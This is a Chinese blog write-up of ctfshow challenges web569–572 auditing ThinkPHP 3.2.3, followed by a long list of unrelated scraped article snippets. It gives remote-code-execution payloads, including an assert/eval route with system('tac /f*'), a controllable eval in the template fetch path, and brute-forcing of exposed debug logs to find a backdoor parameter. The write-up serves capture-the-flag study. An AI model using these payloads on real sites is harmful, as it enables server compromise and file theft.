Z3r4y
Z3r4y

【Web】Ctfshow Thinkphp3.2.3代码审计(1)

目录

①web569

②web570

③web571

④web572

①web569

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第1张图片

 基础考察

/index.php/Admin/Login/ctfshowLogin

②web570

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第2张图片

提示找路由

查看附件源码 (config.php)

发现定义了一个可执行命令的路由规则

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第3张图片

/index.php/ctfshow/assert/eval($_POST[1])

1=system('tac /f*'); 

③web571

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第4张图片

提示控制器 

查看源码(IndexController.class.php)

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第5张图片

传了参数$n

 

调用了show方法

跟进

调用了display

继续跟

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第6张图片

跟进fetch

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第7张图片

在fetch方法中执行了eval('?>'.$_content);,而$content的值是可控的

payload:

/index.php/home/index/index?n= 

④web572

题目提示要爆破,而且不超过365次 (1年的天数)

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第8张图片

ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多站都没关,其目录结构为 Application/Runtime/Logs/Home/年份_月份_日期.log

bp爆破

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第9张图片

 【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第10张图片

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第11张图片

访问/Application/Runtime/Logs/Home/21_04_15.log 

得到附件

[ 2021-04-15T14:49:32+08:00 ] 127.0.0.1 /index.php?showctf=%3C?php%20phpinfo();?%3E
INFO: [ app_init ] --START--
INFO: Run Behavior\BuildLiteBehavior [ RunTime:0.000039s ]
INFO: [ app_init ] --END-- [ RunTime:0.000738s ]
INFO: [ app_begin ] --START--
INFO: Run Behavior\ReadHtmlCacheBehavior [ RunTime:0.000712s ]
INFO: [ app_begin ] --END-- [ RunTime:0.000868s ]
INFO: [ view_parse ] --START--
INFO: [ template_filter ] --START--
INFO: Run Behavior\ContentReplaceBehavior [ RunTime:0.000071s ]
INFO: [ template_filter ] --END-- [ RunTime:0.000204s ]
INFO: Run Behavior\ParseTemplateBehavior [ RunTime:0.008833s ]
INFO: [ view_parse ] --END-- [ RunTime:0.009135s ]
INFO: [ view_filter ] --START--
INFO: Run Behavior\WriteHtmlCacheBehavior [ RunTime:0.000468s ]
INFO: [ view_filter ] --END-- [ RunTime:0.000591s ]
INFO: [ app_end ] --START--
INFO: Run Behavior\ShowPageTraceBehavior [ RunTime:0.000964s ]
INFO: [ app_end ] --END-- [ RunTime:0.001181s ]

发现任意命令执行后门:/index.php?showctf=

payload:

/index.php?showctf=

你可能感兴趣的:(前端,CTF,WEB,安全,笔记,thinkphp,ctfshow)

  • 阅读笔记:x86系统调用入门 yayong Solarisx86solarissystempreprocessormakefilewrapper
    阅读笔记:x86系统调用入门原作者:RussBlaine原文来自:http://blogs.sun.com/roller/page/rab译注者:BadcoffeeEmail:[email protected]:http://blog.csdn.net/yayong2005年7月按:要开始学习像操作系统这样复杂的东东是一个令人头痛的问题。为了帮助新学者理清头绪,这里我们将讨论Sol
  • 【Stable Diffusion部署至Google Colab】 星星点点洲 stablediffusion
    GoogleColab中快速搭建带GPU加速的StableDiffusionWebUIfromgoogle.colabimportdrivedrive.mount('/content/drive')!mkdir/content/drive/MyDrive/sd-webui-files!pipinstalltorch==1.13.1+cu116torchvision==0.14.1+cu116tor
  • 宋红康 MySQL高级篇 学习笔记 偷偷儿 mysql学习笔记
    架构篇1.sql的执行流程查询缓存:有就直接返回了。解析器进行解析:检查sql合不合语法优化器:对sql语句进行逻辑优化,看是否使用索引,生成执行计划。存贮引擎:myisam,innodb去执行上述计划当然返回的时候也会在缓存一下结果。索引及调优篇1.InnoDBB+树索引的注意事项(页分裂的场景)1.根页面万年不动(页分裂):创建后,用户数据用完可用空间,就会新产生一个页a,并将根节点的数据复制
  • 大厂学院 雷丰阳 JUC 学习笔记 偷偷儿 学习笔记java
    基础篇synchronized和lock的区别1.从本质上:synchronized是Java内的一个关键字,lock是一个接口。2.从代码的形式上:synchronized在发生异常时会主动释放锁,lock需要我们在finally语句中释放,不然会死锁;通过lock可以知道锁有没有获取成功,synchronied不行3.从性能上:在1.6前没提出锁升级过程时,重量级锁在被系统检测到后会阻塞尝试获
  • OpenEuler22.03 LTS SP3 系统优化 运维小弟| srebro.cn openeuler系统优化
    OpenEuler22.03LTSSP3系统优化1、关闭selinuxsetenforce0sed-i"s#SELINUX=enforcing#SELINUX=disabled#g"/etc/selinux/config2、禁用swapswapoff-ased-ri's/.*swap.*/#&/'/etc/fstab3、公有云机器,必须安全加固(1)、设置禁止root通过ssh远程登录【修改之前请
  • 私有AI对话系统实战:基于Ollama+OpenWebUI的DeepSeek-R1本地化部署手把手教学(可共享访问) Developer-YC DeekSeek-R1大模型解读与实战教学人工智能pythonjavagithubnode.js语言模型后端
    引言:为什么选择本地部署大模型?在数据隐私日益重要的今天,云端AI服务的局限性逐渐显现——敏感信息泄露风险、网络延迟依赖、定制化能力不足。而通过**Ollama(模型管理框架)和OpenWebUI(可视化交互工具)**的组合,开发者可以轻松实现大模型(如DeepSeek-R1)的本地部署,兼顾性能与安全。本文将以DeepSeek-R1为例,详解从环境配置到实战应用的全流程。一、工具与模型简介1.O
  • 推荐开源备份神器:BackupPC,企业级数据守护者 徐耘馨
    推荐开源备份神器:BackupPC,企业级数据守护者项目地址:https://gitcode.com/gh_mirrors/ba/backuppc在数字时代,数据如同企业的生命线,重要性不言而喻。为了保障这份“生命线”的安全,今天我们来探讨一个高效且成熟的备份解决方案——BackupPC。项目介绍BackupPC是一款基于Perl编写的高性价比企业级备份系统,专为Linux、Windows和Mac
  • 数据守护者:备份文件的重要性及自动化备份实践 Konkakou 电脑文件自动备份文件自动备份win10自动备份一键备份文件全自动备份文件全自动备份
    在信息化社会,数据已成为企业运营和个人生活的重要组成部分。无论是企业的核心业务数据,还是个人的珍贵照片、重要文档,数据的丢失或损坏都可能带来无法估量的损失。因此,备份文件的重要性愈发凸显,它不仅是数据安全的最后一道防线,更是确保业务连续性和个人隐私安全的基石。电脑文件自动备份一、备份文件的重要性备份文件,顾名思义,就是将原始数据复制到另一个存储介质或位置,以便在原始数据丢失或损坏时能够恢复。这一简
  • 2025超全整理!H3C路由交换核心命令宝典,助你轻松玩转网络配置 wljslmz 网络技术H3C路由器交换机命令大全
    H3C(新华三)作为国内网络设备的领军品牌,其路由器和交换机广泛应用于企业、数据中心及运营商网络。掌握H3C设备的配置命令,是网络工程师的必备技能!本文结合2025年最新技术文档与实战经验,系统梳理基础配置、VLAN管理、路由协议、IRF堆叠、安全加固等场景的核心命令,助你从“小白”进阶为“大神”!文末还附赠高频踩坑指南,速速收藏⭐!一、基础配置篇:快速上手H3C设备1.设备初始化与视图切换进入系
  • 9 个构建安全 PHP 应用的开发技巧 程序员阿凡提 PHP实战教程php
    在软件开发的征程中,即便是那些身经百战、经验极为丰富的开发人员,也难免会遭遇种种始料未及的棘手挑战。有时,源自第三方API的数据格式混乱不堪,完全偏离预期;又或是用户输入一些稀奇古怪、让人摸不着头脑的字符串,令人防不胜防;还有可能隐藏着悄然引发安全漏洞的故障,在暗处伺机而动,给整个项目带来巨大风险。而在以灵活性著称、广受开发者青睐的PHP语言环境里,将安全性置于首位绝非可有可无的附加项,它实实在在
  • Java 实现拖拽列表更新排序 架构师成长进阶空间 Javaspringcloudspringbootjava后端
    拖拽列表更新排序,接口提供给前端这个功能主要是需要的算法逻辑很多图解:如在前端页面上想把id=5拖拽到id=3上拖拽之后的效果:解析图例:代码示例:DevToCoding|Java面试指南、学习笔记/***拖拽数据更新排序*@paramcurrentId当前数据id*@paramtargetId目标数据id*@return*/@RequestMapping("/sort/{currentId}/{
  • 工作计划进度表怎么做?探索主流的8款软件
    本文介绍了八款主流的工作计划软件,包括:1.Worktile,2.PingCode,3.腾讯文档,4.钉钉,5.滴答清单,6.有道云笔记,7.Trello,8.Monday.com。制作工作计划进度表是确保项目按时完成的重要步骤,一个好的进度表不仅能清晰显示任务分配和截止日期,还能帮助团队成员理解自己的责任和优先级。随着项目管理工具的不断发展,市场上出现了多种软件,专门设计来帮助制作和管理工作计划
  • Flux架构及Redux实践 GbkMobile 架构
    随着前端应用的复杂性不断增加,有效管理应用状态和数据流变得至关重要。Flux架构及其最流行的实现之一Redux,为前端开发人员提供了一种可靠且可扩展的解决方案。本文将深入浅出地介绍Flux架构的核心概念,并通过实际的Redux实践示例来帮助读者更好地理解和应用这些概念。什么是Flux架构?Flux是一种前端应用架构模式,旨在解决传统MVC(Model-View-Controller)模式在大型应用
  • python编程入门学习(3)——自用笔记 徐少19 python入门python
    目录第五章:if语句一个简单的示例条件测试if语句使用if语句处理列表第六章:字典一个简单的字典使用字典遍历字典嵌套在列表中存储字典在字典中存储列表在字典中存储字典第五章:if语句一个简单的示例#if语句示例cars=['bmw','audi','toyota','subaru']forcarincars:ifcar=='bmw':print(car.upper())else:print(car.
  • 当 Deepseek 频繁提示 “服务器繁忙“,我们该如何破局? 晚风る AI人工智能网络
    在使用Deepseek的过程中,不少用户都遭遇过“服务器繁忙”的提示,这无疑给我们的使用体验带来了极大的困扰。那么,当这种情况频繁出现时,我们究竟该如何应对呢?本文将为大家提供一些有效的解决方案。一、原因分析DeepSeek服务器繁忙的原因可能有以下几点:用户流量过大:如用户量激增,高峰时段访问。技术性能瓶颈:如算力瓶颈、带宽限制、模型优化不足。安全问题:如外部恶意攻击。服务维护与限制:如服务维护
  • Flux架构:构建可预测的Web应用状态管理体系 阿珊和她的猫 架构前端
    前端开发工程师、技术日更博主、已过CET6阿珊和她的猫_CSDN博客专家、23年度博客之星前端领域TOP1牛客高级专题作者、打造专栏《前端面试必备》、《2024面试高频手撕题》蓝桥云课签约作者、上架课程《Vue.js和Egg.js开发企业级健康管理项目》、《带你从入门到实战全面掌握uni-app》前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站。文章
  • 标准应用 | 2025年网络安全服务成本度量实施参考 安全大哥 Web渗透测试应用安全web安全网络安全
    01网络安全服务成本度量依据相关新变化为了解决我国网络安全服务产业发展中面临的服务供需两方对于服务成本组成认知偏差较大、网络安全服务成本度量缺乏依据的问题,中国网络安全产业联盟(CCIA)组织北京赛西科技发展有限责任公司、北京安信天行科技有限公司等21家相关单位共同研究制定了GB/T42461-2023《信息安全技术网络安全服务成本度量指南》(以下简称“标准”)。该标准以原劳动和社会保障部发布的《
  • 中国第一本介绍企业级开发工具Zend的书籍 weixin_34245749 开发工具数据库javascriptViewUI
    【书名】大道PHP:LAMP+Zend+开源框架整合开发与实战【作者】三扬科技【ISBN】978-7-121-09171-1【出版社】电子工业出版社【出版日期】2009年9月【定价】99.00元(含视频DVD1张)【宣传语】第一本介绍企业级开发工具Zend的书籍最完整的PHP5开发技术与实战代码万用大全基于Linux+Apache+MySQL+PHP黄金组合,Socket、WebService、A
  • Forrester发布2024年五大网络安全新威胁 岛屿旅人 网络安全web安全网络安全网络安全
    文章目录前言一、大选年的叙事(舆论)操控攻击二、深度伪造引发身份安全危机三、生成式人工智能数据泄露四、人工智能软件供应链攻击五、太空成为安全战略高点数据泄露平均成本高达218万美元前言人工智能正重塑网络安全格局,武器化大语言模型正成为首选攻击工具,安全团队在应对武器化人工智能攻击方面将面临日益严峻的挑战。Forrester近日发布《2024年网络安全威胁预测报告》指出,人工智能正重塑网络安全格局,
  • 2025年美赛数学建模 ICM 问题 F: 网络安全强大吗? 深度学习&目标检测实战项目 2025年美赛MCM/ICM数学建模2025年数学建模美赛2025美赛F题网络安全强大吗思路代码F题
    全部都是公开资料,不代写论文,请勿盲目订阅)2025年数学建模美赛期间,会发布思路和代码,赛前半价,赛前会发布往年美赛的经典案例,赛题会结合最新款的chatgpto1pro分析,会根据赛题难度,选择合适的题目着重分析,没有代写论文服务,只会发布思路和代码,因为赛制要求,不会回复私信。内容可能达不到大家预期,请不要盲目订阅。已开通200美元/月的chatgptpro会员,会充分利用chatgpto1
  • 学习使用Elm架构的JavaScript项目 陈昊和
    学习使用Elm架构的JavaScript项目learn-elm-architecture-in-javascript:unicorn:LearnhowtobuildwebappsusingtheElmArchitecturein"vanilla"JavaScript(step-by-stepTDDtutorial)!项目地址:https://gitcode.com/gh_mirrors/le/le
  • 学习Elm架构在JavaScript中的应用 萧书泓
    学习Elm架构在JavaScript中的应用learn-elm-architecture-in-javascript:unicorn:LearnhowtobuildwebappsusingtheElmArchitecturein"vanilla"JavaScript(step-by-stepTDDtutorial)!项目地址:https://gitcode.com/gh_mirrors/le/le
  • 推荐开源项目:Flame —— 构建PureScript Web应用的轻量级框架 贾彩知Maura
    推荐开源项目:Flame——构建PureScriptWeb应用的轻量级框架purescript-flameFast&simpleframeworkforbuildingwebapplications项目地址:https://gitcode.com/gh_mirrors/pu/purescript-flame项目介绍Flame是一个受Elm架构启发,专为使用PureScript开发web应用程序而设
  • 探索Redux:构建可预测、可测试的JavaScript应用 黎杉娜Torrent
    探索Redux:构建可预测、可测试的JavaScript应用learn-redux:boom:ComprehensiveNotesforLearning(howtouse)ReduxtomanagestateinyourWeb/Mobile(React.js)Apps.项目地址:https://gitcode.com/gh_mirrors/le/learn-redux项目介绍在现代Web开发中,J
  • 国家网络安全宣传周 | 2024年网络安全领域重大政策法规一览 网安加社区 安全网络安全政策法规
    随着我国网络安全政策法规不断健全,网络安全工作机制也日渐成熟,各项工作已稳步步入法治化的轨道,与此同时,网络安全标准体系逐步清晰,安全防线日益坚固,为国家的网络安全建设提供了坚实的基础。网安加社区特为大家整理了2024年国内发布的网络安全领域相关政策法规,希望能为广大从业者与关注者提供相关参考,共同促进网络安全生态的健康发展。2024年网络安全重大政策法规一览◉1.《旅游大数据安全与隐私保护要求(
  • 农业机器人综述:技术现状、应用场景及未来展望 橙蜂智能 机器人
    农业机器人综述:技术现状、应用场景及未来展望引言一、农业机器人的技术现状1.感知模块2.导航与定位模块3.控制与执行模块4.通信与数据传输模块5.决策与人工智能模块6.电源管理与能源模块二、农业机器人的应用场景1.播种与施肥2.植保与除草3.采摘与收获4.土壤和作物监测5.温室管理与环境控制6.多机器人协作三、农业机器人面临的挑战1.成本较高2.环境适应性差3.技术成熟度有待提高4.数据安全和隐私
  • 探索Elm架构:用纯JavaScript构建优雅的Web应用 邵瑗跃Free
    探索Elm架构:用纯JavaScript构建优雅的Web应用learn-elm-architecture-in-javascript:unicorn:LearnhowtobuildwebappsusingtheElmArchitecturein"vanilla"JavaScript(step-by-stepTDDtutorial)!项目地址:https://gitcode.com/gh_mirro
  • [失业前端恶补算法]JavaScript leetcode刷题top100(六):字母异位词分组、最长连续序列、找到字符串中所有字母异位词、最大子数组和、除自身以外数组的乘积 摸鱼老萌新 失业前端恶补算法前端javascript动态规划算法哈希
    专栏声明:只求用最简单的,容易理解的方法通过,不求优化,不喜勿喷49.字母异位词分组题面给你一个字符串数组,请你将字母异位词组合在一起。可以按任意顺序返回结果列表。字母异位词是由重新排列源单词的所有字母得到的一个新单词。知识点:哈希表、排序思路这里用了js语言的一个小技巧,我们可以使用split这个api将字符串变成字符的数组,之后我们对得到的数组进行排序,这样字母异位词得到了结果字符串的一致的,
  • Java面试八股文:Memcached面试题专场(持续更新中......) Java凤梨 Java金三银四面试题memcachedjava面试
    全套Java金三银四面试题持续更新可文末自取,建议关注收藏不然下次找不到哟~目录1、Memcached是什么,有什么作用?memcached服务在企业集群架构中有哪些应用场景?一、作为数据库的前端缓存应用二、作业集群的session会话共享存储。2、Memcached服务分布式集群如何实现?3、Memcached服务特点及工作原理是什么?4、简述Memcached内存管理机制原理?SlabAllo
  • thymeleaf模板_Thymeleaf参考手册(十五):模板缓存 weixin_39814960 thymeleaf模板
    Thymeleaf的工作要归功于一组解析器(用于标记和文本),该解析器将模板解析为事件序列(打开标签,文本,关闭标签,注释等)和一系列处理器(每种需要一种行为)应用–修改模板解析的事件序列,以便通过将原始模板与我们的数据结合来创建我们期望的结果。默认情况下,它还包括存储已解析模板的缓存;在处理模板文件之前读取和解析模板文件所导致的事件顺序。在Web应用程序中工作时,此功能特别有用,它基于以下概念:
  • java短路运算符和逻辑运算符的区别 3213213333332132 java基础
    /* * 逻辑运算符——不论是什么条件都要执行左右两边代码 * 短路运算符——我认为在底层就是利用物理电路的“并联”和“串联”实现的 * 原理很简单,并联电路代表短路或(||),串联电路代表短路与(&&)。 * * 并联电路两个开关只要有一个开关闭合,电路就会通。 * 类似于短路或(||),只要有其中一个为true(开关闭合)是
  • Java异常那些不得不说的事 白糖_ javaexception
    一、在finally块中做数据回收操作 比如数据库连接都是很宝贵的,所以最好在finally中关闭连接。 JDBCAgent jdbc = new JDBCAgent(); try{ jdbc.excute("select * from ctp_log"); }catch(SQLException e){ ... }finally{ jdbc.close();
  • utf-8与utf-8(无BOM)的区别 dcj3sjt126com PHP
    BOM——Byte Order Mark,就是字节序标记   在UCS 编码中有一个叫做"ZERO WIDTH NO-BREAK SPACE"的字符,它的编码是FEFF。而FFFE在UCS中是不存在的字符,所以不应该出现在实际传输中。UCS规范建议我们在传输字节流前,先传输 字符"ZERO WIDTH NO-BREAK SPACE"。这样如
  • JAVA Annotation之定义篇 周凡杨 java注解annotation入门注释
        Annotation: 译为注释或注解 An annotation, in the Java computer programming language, is a form of syntactic metadata that can be added to Java source code. Classes, methods, variables, pa
  • tomcat的多域名、虚拟主机配置 g21121 tomcat
    众所周知apache可以配置多域名和虚拟主机,而且配置起来比较简单,但是项目用到的是tomcat,配来配去总是不成功。查了些资料才总算可以,下面就跟大家分享下经验。 很多朋友搜索的内容基本是告诉我们这么配置: 在Engine标签下增面积Host标签,如下: <Host name="www.site1.com" appBase="webapps"
  • Linux SSH 错误解析(Capistrano 的cap 访问错误 Permission ) 510888780 linuxcapistrano
    1.ssh -v [email protected] 出现 Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password). 错误 运行状况如下: OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013 debug1: Reading configuratio
  • log4j的用法 Harry642 javalog4j
    一、前言:     log4j 是一个开放源码项目,是广泛使用的以Java编写的日志记录包。由于log4j出色的表现,     当时在log4j完成时,log4j开发组织曾建议sun在jdk1.4中用log4j取代jdk1.4 的日志工具类,但当时jdk1.4已接近完成,所以sun拒绝使用log4j,当在java开发中
  • mysql、sqlserver、oracle分页,java分页统一接口实现 aijuans oraclejave
    定义:pageStart 起始页,pageEnd 终止页,pageSize页面容量 oracle分页:     select * from ( select mytable.*,rownum num from (实际传的SQL) where rownum<=pageEnd) where num>=pageStart sqlServer分页:  
  • Hessian 简单例子 antlove javaWebservicehessian
    hello.hessian.MyCar.java package hessian.pojo; import java.io.Serializable; public class MyCar implements Serializable { private static final long serialVersionUID = 473690540190845543
  • 数据库对象的同义词和序列 百合不是茶 sql序列同义词ORACLE权限
    回顾简单的数据库权限等命令; 解锁用户和锁定用户 alter user scott account lock/unlock; //system下查看系统中的用户 select * dba_users; //创建用户名和密码 create user wj identified by wj; identified by //授予连接权和建表权 grant connect to
  • 使用Powermock和mockito测试静态方法 bijian1013 持续集成单元测试mockitoPowermock
            实例: package com.bijian.study; import static org.junit.Assert.assertEquals; import java.io.IOException; import org.junit.Before; import org.junit.Test; import or
  • 精通Oracle10编程SQL(6)访问ORACLE bijian1013 oracle数据库plsql
    /* *访问ORACLE */ --检索单行数据 --使用标量变量接收数据 DECLARE v_ename emp.ename%TYPE; v_sal emp.sal%TYPE; BEGIN select ename,sal into v_ename,v_sal from emp where empno=&no; dbms_output.pu
  • 【Nginx四】Nginx作为HTTP负载均衡服务器 bit1129 nginx
     Nginx的另一个常用的功能是作为负载均衡服务器。一个典型的web应用系统,通过负载均衡服务器,可以使得应用有多台后端服务器来响应客户端的请求。一个应用配置多台后端服务器,可以带来很多好处:   负载均衡的好处 增加可用资源 增加吞吐量 加快响应速度,降低延时 出错的重试验机制 Nginx主要支持三种均衡算法: round-robin l
  • jquery-validation备忘 白糖_ jquerycssF#Firebug
    留点学习jquery validation总结的代码:   function checkForm(){ validator = $("#commentForm").validate({// #formId为需要进行验证的表单ID errorElement :"span",// 使用"div"标签标记错误, 默认:&
  • solr限制admin界面访问(端口限制和http授权限制) ronin47 限定Ip访问
    solr的管理界面可以帮助我们做很多事情,但是把solr程序放到公网之后就要限制对admin的访问了。 可以通过tomcat的http基本授权来做限制,也可以通过iptables防火墙来限制。 我们先看如何通过tomcat配置http授权限制。 第一步: 在tomcat的conf/tomcat-users.xml文件中添加管理用户,比如: <userusername="ad
  • 多线程-用JAVA写一个多线程程序,写四个线程,其中二个对一个变量加1,另外二个对一个变量减1 bylijinnan java多线程
    public class IncDecThread { private int j=10; /* * 题目:用JAVA写一个多线程程序,写四个线程,其中二个对一个变量加1,另外二个对一个变量减1 * 两个问题: * 1、线程同步--synchronized * 2、线程之间如何共享同一个j变量--内部类 */ public static
  • 买房历程 cfyme
        2015-06-21: 万科未来城,看房子   2015-06-26: 办理贷款手续,贷款73万,贷款利率5.65=5.3675   2015-06-27: 房子首付,签完合同   2015-06-28,央行宣布降息 0.25,就2天的时间差啊,没赶上。   首付,老婆找他的小姐妹接了5万,另外几个朋友借了1-
  • [军事与科技]制造大型太空战舰的前奏 comsci 制造
           天气热了........空调和电扇要准备好..........        最近,世界形势日趋复杂化,战争的阴影开始覆盖全世界..........        所以,我们不得不关
  • dateformat dai_lm DateFormat
    "Symbol Meaning Presentation Ex." "------ ------- ------------ ----" "G era designator (Text) AD" "y year
  • Hadoop如何实现关联计算 datamachine mapreducehadoop关联计算
        选择Hadoop,低成本和高扩展性是主要原因,但但它的开发效率实在无法让人满意。     以关联计算为例。     假设:HDFS上有2个文件,分别是客户信息和订单信息,customerID是它们之间的关联字段。如何进行关联计算,以便将客户名称添加到订单列表中?   &nbs
  • 用户模型中修改用户信息时,密码是如何处理的 dcj3sjt126com yii
    当我添加或修改用户记录的时候对于处理确认密码我遇到了一些麻烦,所有我想分享一下我是怎么处理的。 场景是使用的基本的那些(系统自带),你需要有一个数据表(user)并且表中有一个密码字段(password),它使用 sha1、md5或其他加密方式加密用户密码。 面是它的工作流程: 当创建用户的时候密码需要加密并且保存,但当修改用户记录时如果使用同样的场景我们最终就会把用户加密过的密码再次加密,这
  • 中文 iOS/Mac 开发博客列表 dcj3sjt126com Blog
      本博客列表会不断更新维护,如果有推荐的博客,请到此处提交博客信息。 本博客列表涉及的文章内容支持 定制化Google搜索,特别感谢 JeOam 提供并帮助更新。 本博客列表也提供同步更新的OPML文件(下载OPML文件),可供导入到例如feedly等第三方定阅工具中,特别感谢 lcepy 提供自动转换脚本。这里有导入教程。
  • js去除空格,去除左右两端的空格 蕃薯耀 去除左右两端的空格js去掉所有空格js去除空格
    js去除空格,去除左右两端的空格 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>&g
  • SpringMVC4零配置--web.xml hanqunfeng springmvc4
    servlet3.0+规范后,允许servlet,filter,listener不必声明在web.xml中,而是以硬编码的方式存在,实现容器的零配置。 ServletContainerInitializer:启动容器时负责加载相关配置 package javax.servlet; import java.util.Set; public interface ServletContainer
  • 《开源框架那些事儿21》:巧借力与借巧力 j2eetop 框架UI
    同样做前端UI,为什么有人花了一点力气,就可以做好?而有的人费尽全力,仍然错误百出?我们可以先看看几个故事。 故事1:巧借力,乌鸦也可以吃核桃 有一个盛产核桃的村子,每年秋末冬初,成群的乌鸦总会来到这里,到果园里捡拾那些被果农们遗落的核桃。 核桃仁虽然美味,但是外壳那么坚硬,乌鸦怎么才能吃到呢?原来乌鸦先把核桃叼起,然后飞到高高的树枝上,再将核桃摔下去,核桃落到坚硬的地面上,被撞破了,于是,
  • JQuery EasyUI 验证扩展 可怜的猫 jqueryeasyui验证
      最近项目中用到了前端框架-- EasyUI,在做校验的时候会涉及到很多需要自定义的内容,现把常用的验证方式总结出来,留待后用。   以下内容只需要在公用js中添加即可。   使用类似于如下: <input class="easyui-textbox" name="mobile" id="mobile&
  • 架构师之httpurlconnection----------读取和发送(流读取效率通用类) nannan408
    1.前言.    如题. 2.代码. /* * Copyright (c) 2015, S.F. Express Inc. All rights reserved. */ package com.test.test.test.send; import java.io.IOException; import java.io.InputStream
  • Jquery性能优化 r361251 JavaScriptjquery
    一、注意定义jQuery变量的时候添加var关键字 这个不仅仅是jQuery,所有javascript开发过程中,都需要注意,请一定不要定义成如下: $loading = $('#loading'); //这个是全局定义,不知道哪里位置倒霉引用了相同的变量名,就会郁闷至死的 二、请使用一个var来定义变量 如果你使用多个变量的话,请如下方式定义: . 代码如下: var page
  • 在eclipse项目中使用maven管理依赖 tjj006 eclipsemaven
    概览: 如何导入maven项目至eclipse中 建立自有Maven  Java类库服务器 建立符合maven代码库标准的自定义类库 Maven在管理Java类库方面有巨大的优势,像白衣所说就是非常“环保”。 我们平时用IDE开发都是把所需要的类库一股脑的全丢到项目目录下,然后全部添加到ide的构建路径中,如果用了SVN/CVS,这样会很容易就 把
  • 中国天气网省市级联页面 x125858805 级联
    1、页面及级联js <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> &l
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他